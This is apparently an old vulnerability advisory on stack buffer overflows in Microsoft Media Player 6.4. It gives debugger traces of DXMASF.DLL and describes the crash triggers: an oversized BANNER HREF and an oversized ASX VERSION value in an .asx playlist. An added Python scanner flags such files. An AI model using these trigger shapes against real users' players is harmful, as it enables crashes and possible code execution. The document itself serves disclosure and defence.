COMMAND
Media Player
SYSTEMS AFFECTED
Microsoft Media Player 6.4
PROBLEM
Pauli Ojanpera found the following. The HREF attribute of the BANNER tag can
be abused to smash our lovely stack. This information applies to
Media Player 6.4 at least. You can try it out with your version
at
http://mediaplayerbug.tripod.com/
As for the .asx attachment, it won't work as it is.
You have to edit it to refer to a valid .asf/.avi file. It is a
text file, so that should not be too much trouble.
Execution path of DXMASF.DLL (time stamp 0x3a2ed2f1) in detail
follows. This is the recently patched one.
1D3612BD : MSDXM!0x1D3197F0( 0x00298678, 0x0009e724, 0x002a015c ) {
1D3197F0 :
1D319843 : Kernel32!LoadLibraryA("dxmasf.dll")
1D319858 : Kernel32!GetProcAddress("UtilLoadImage",0x11f00000,0)
1D31987A : Kernel32!0x77F350A3(0,0,0x9e724,-1,0x6f13c,0x825,0,0)
1D319895 : DXMASF!UtilLoadImage( ? )
1FF26708 :
1FF26731 : 1FF26A97()
1FF2673C : 1FF26AA1()
1FF26AA1 :
1FF26AB5 : 1FF26C2A()
1FF26ACC : Kernel32!0x77F1297C() 1FF010D8
1FF26AD4 : 1FF3EFA6()
1FF26AE0 : Kernel32!0x77F127E6() 1FF0108C
1FF26AFE : 1FF3F3E8()
1FF26B44 : 1FF3F2B4()
1FF26B5C : 1FF3F260()
1FF26BB5 : Wininet!0x702079AB() 1FF012F0
1FF26BF3 : Kernel32!0x77F1297C() 1FF010D8
1FF26BFB : 1FF3EFA6()
1FF26C0C : Kernel32!0x77F127E6() 1FF0108C
1FF26C19 : } <- Let the parties begin!
1FF26741 :
1D319898 :
1D3612C0 :
Execution path of DXMASF.DLL (time stamp 0x382cbe58) in detail
follows:
1D319895 : DXMASF!UtilLoadImage( ? ) {
1FF26716 :
1FF2674A : 1FF26AAF( x ) {
1FF26ADA : Kernel32!0x77F1297C( x ) 1FF010D8
1FF26AE2 : 1FF3EFB6()
1FF26AEE : Kernel32!0x77F127E6() 1FF0108C
1FF26B0C : 1FF3F3F8() (retrieve the string address at heap?)
1FF26B3B : movs
1FF26B52 : 1FF3F2C4:7801FAAD:fopen() (fails)
1FF26B6A : 1FF3F270:780252FE:strrchr() (strip "C:\")
1FF26BAC : movs
1FF26BC3 : WININET!0x702079AB() 1FF012F0 (try if it's an URL?)
1FF26BE8 : movs (copy back the stripped string)
1FF26C01 : Kernel32!0x77F1297C() 1FF010D8
1FF26C09 : 1FF3EFB6:780037CA:new()
1FF26C1A : Kernel32!0x77F127E6() 1FF0108C
1FF26C27 : } <- Let the parties begin!
1FF2674F :
}
1D319898 :
Execution path of DXMASF.DLL (time stamp 0x35ed5d3d) in detail
follows. This is the SP4 one.
1D319895 : DXMASF!UtilLoadImage=1FF34CCD() {
1FF34CF6 : 1FF3505C() (dummy init)
1FF34D01 : 1FF35066( 0x0006F13C ) {
1FF3507A : 1FF351BF()
1FF35091 : Kernel32!0x77F1297C( 0x0006F13C ) 1FF010E8
1FF35099 : 1FF368A6:780037CA:new( 0x178 ) 1FF011E8
1FF350A5 : Kernel32!0x77F127E6( heapbuf(0x002A8C90), 0x0006F13C )1FF01080
{
77F1282F : movs
}
1FF350AB :
1FF350C4 : URLMON!0x702B7BC2( 0, 0x2A8C90, 0x6EFA0, 0x104 ) 1FF01328 {
702B7BE0 : Kernel32!0x77F1297C() (strlen)
702B7BF1 : URLMON!0x702B753C( 0x44 )
702B7C15 : to_wide_char( 0, 0, 0x2A8FD0, -1, 0x6EDF0 ) 702712B8
702B7C26 : OLE32!0x77B2122C( 0x208, 0x6EDF0 )
702B7C44 : 702B77F8()
702B7C65 : Kernel32!0x77F12AE7()
702B7C72 : Kernel32!0x77F350A3()
}
1FF350EB : 1FF36D9E:7801FAAD:fopen( 0x6EFA0, 0x1FF057A0 )
1FF350CF : 1FF368A0:78003C6E:delete( 0x2A8C90 ) 1FF011E0
}
1D319898 :
The exploit was posted as a base64-encoded MIME attachment, money_is.asx, an .asx playlist carrying the oversized BANNER HREF value.
ByteRage found yet another buffer overflow condition in the ASX VERSION tag:
an *.ASX file with the contents
<ASX VERSION="AAAAAAAAAAA ... AAAAAAA">
crashes MPLAYER 6.4 in dxmasf.dll.
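As an added example (not from the advisory or from either reporter), a small scanner that flags .asx playlists carrying the two attribute shapes described above, an oversized BANNER HREF or ASX VERSION value, the kind of check a mail gateway or upload filter could run before the file reaches the player. The 255-byte threshold and the sample playlists are assumptions and constructed inputs, not values taken from the advisory.

```python
import re

# Assumed threshold: the advisory gives no exact overflow length, and a real
# URL or version string in an .asx playlist is far shorter than this.
MAX_ATTR_LEN = 255

# (tag, attribute) pairs the advisory names as overflow triggers. ASX markup
# is case-insensitive, so names are lower-cased before lookup.
WATCHED = {("asx", "version"), ("banner", "href")}
WATCHED_TAGS = {tag for tag, _ in WATCHED}

_TAG_RE = re.compile(r"<\s*([A-Za-z]+)([^>]*)>", re.DOTALL)
_ATTR_RE = re.compile(r'([A-Za-z]+)\s*=\s*"([^"]*)"', re.DOTALL)


def scan_asx(text):
    """Return (TAG, ATTR, length, reason) tuples for suspicious values.

    A watched attribute is flagged when it exceeds MAX_ATTR_LEN or carries
    control bytes. If a crafted value breaks the quoting so no attribute
    parses, the raw attribute region of a watched tag is measured instead.
    """
    findings = []
    for m in _TAG_RE.finditer(text):
        tag, attrs = m.group(1).lower(), m.group(2)
        seen = len(findings)
        for name, value in _ATTR_RE.findall(attrs):
            if (tag, name.lower()) not in WATCHED:
                continue
            if len(value) > MAX_ATTR_LEN:
                findings.append((tag.upper(), name.upper(), len(value), "oversized"))
            elif any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
                findings.append((tag.upper(), name.upper(), len(value), "control-bytes"))
        if len(findings) == seen and tag in WATCHED_TAGS and len(attrs) > MAX_ATTR_LEN:
            findings.append((tag.upper(), "*", len(attrs), "oversized-tag"))
    return findings


# Constructed samples: a benign playlist, then two shaped like the advisory's
# triggers (oversized BANNER HREF, oversized ASX VERSION).
BENIGN_ASX = '<ASX VERSION="3.0">\r\n<ENTRY><REF HREF="sample.avi" /></ENTRY>\r\n</ASX>\r\n'
OVERSIZED_HREF_ASX = (
    '<ASX VERSION="3.0">\r\n<BANNER HREF="C:\\' + "A" * 400 + '" />\r\n'
    '<ENTRY><REF HREF="sample.avi" /></ENTRY>\r\n</ASX>\r\n'
)
OVERSIZED_VERSION_ASX = '<ASX VERSION="' + "A" * 1000 + '">'
```

The raw-region fallback matters because the parser is a regex, not an XML parser: a value that embeds a quote character would otherwise truncate the match and slip through.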
SOLUTION
Nothing yet.